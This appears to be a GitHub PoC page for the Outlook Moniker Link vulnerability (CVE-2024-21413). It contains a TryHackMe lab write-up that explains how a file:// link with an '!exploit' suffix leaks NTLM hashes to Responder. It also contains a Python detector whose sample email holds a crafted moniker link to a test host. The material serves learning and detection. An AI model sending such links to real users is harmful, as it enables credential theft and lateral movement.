
CVE-2024-21413 PoC — Microsoft Outlook Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413)
Description: Microsoft Outlook Remote Code Execution Vulnerability

Readme
### 🛡️ Moniker Link (CVE-2024-21413)

**Room:** [Moniker Link (CVE-2024-21413) — TryHackMe](https://tryhackme.com/room/monikerlink)  
**Status:** ✅ Completed  
**Date:** *30 May 2025*

---

### 🎯 Objective  
Understand and exploit CVE-2024-21413, a vulnerability in Microsoft Outlook that bypasses Protected View using Moniker Links to leak NTLM credentials. Learn how to perform the attack and detect or mitigate it.

---

### 🗝️ Key Concepts  
- **Moniker Link** — A type of hyperlink that can reference system components and applications in Windows using the COM model.
- **Protected View** — Outlook's read-only mode that blocks external content to protect users.
- **NTLM Hash Leak** — Triggering an SMB authentication attempt from the victim leaks their Net-NTLMv2 hash to the attacker.
- **file:// Exploit** — Appending `!exploit` to a file:// URL bypasses Protected View and triggers an SMB connection to the referenced host.
- **Responder** — A tool used to capture NTLM hashes by listening for SMB authentication requests.
- **RCE (Remote Code Execution)** — The vulnerability also has the potential for code execution, though no public PoC currently exists.
- **Detection** — YARA rules and Wireshark can help detect attempted or successful exploitation.

---

### 🛠️ Tools Used  
- **Responder** — Captured the victim’s NTLM hash once the malicious link was clicked.
- **Python (smtplib)** — Used to send the malicious email with the Moniker Link to the victim.
- **Outlook (on vulnerable VM)** — Email client that parsed the Moniker Link and leaked credentials.
- **YARA** — Rule by Florian Roth to detect email indicators of compromise.
- **Wireshark** — Used to view the SMB authentication request and hash in transit.

---

### ⚠️ Challenges Faced  
- Modifying the Moniker Link syntax correctly to bypass Protected View required close attention to detail.  
- Adjusting the exploit script to match IP and mail server settings took a couple of attempts.

---

### 🧠 What I Learned  
- Even trusted software like Outlook can be tricked into leaking credentials with low-complexity attacks.  
- Small syntax changes (like `!exploit`) can completely bypass built-in protections.  
- YARA rules are useful for catching suspicious behaviour in email content.  
- Responder is a powerful tool for capturing authentication attempts — especially NTLM leaks over SMB.
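As an added defensive example (not code from the room or the writeup), the check below scans a message for the file:// hyperlink pattern described under Key Concepts, flagging links that carry the `!` moniker segment; it complements the YARA-based detection mentioned above. The .eml text, the host 192.0.2.10 and the paths are constructed sample data.

```python
import re
from email import message_from_string
from email.policy import default

# Outlook parses file://<host>/<share>/<path>!<segment> as a COM moniker rather than a
# plain file link, and following it makes the client authenticate to <host> over SMB.
# Match UNC-style file:// URLs; the '!' segment is the bypass marker to look for.
MONIKER_RE = re.compile(
    r"""file://(?P<host>[^/\\\s"'<>]+)[/\\](?P<rest>[^\s"'<>]*)""", re.IGNORECASE
)

# Constructed sample message: the host, addresses and paths are made up for this example.
SAMPLE_EML = """\
From: sender@example.test
To: victim@example.test
Subject: Quarterly report
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>
<p>Bypass form: <a href="file://192.0.2.10/reports/q1.docx!test">Q1 report</a></p>
<p>Plain UNC link: <a href="file://192.0.2.10/reports/q1.docx">Q1 report</a></p>
<p>Benign: <a href="https://intranet.example.test/q1">portal</a></p>
</body></html>
"""


def find_moniker_links(raw_eml: str) -> list:
    """Return one finding per file:// URL in any text/html or text/plain part."""
    msg = message_from_string(raw_eml, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() not in ("text/html", "text/plain"):
            continue
        for m in MONIKER_RE.finditer(part.get_content()):
            findings.append({
                "url": m.group(0),
                "host": m.group("host"),
                "has_bang": "!" in m.group("rest"),  # CVE-2024-21413 Moniker Link marker
                "part": part.get_content_type(),
            })
    return findings


def suspicious_links(raw_eml: str) -> list:
    """Only the findings that carry the '!' segment; plain UNC links are lower priority."""
    return [f for f in find_moniker_links(raw_eml) if f["has_bang"]]
```

Run it over quarantined mail or a mail-gateway export; a `has_bang` hit pointing at an external host is the indicator worth alerting on, a plain UNC link is worth a look but is also common in legitimate internal mail.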

---

### 🌐 Real-World Application  
> A phishing email using a Moniker Link can be enough to leak NTLM hashes from Outlook users. In corporate environments, this could lead to lateral movement, privilege escalation, or pass-the-hash attacks — even before any malware is deployed.

---

### 💭 Reflections  
- This CVE was both simple and powerful — just one click on a crafted link and credentials are leaked.  
- The attack chain was straightforward but highlights the importance of patching and monitoring.  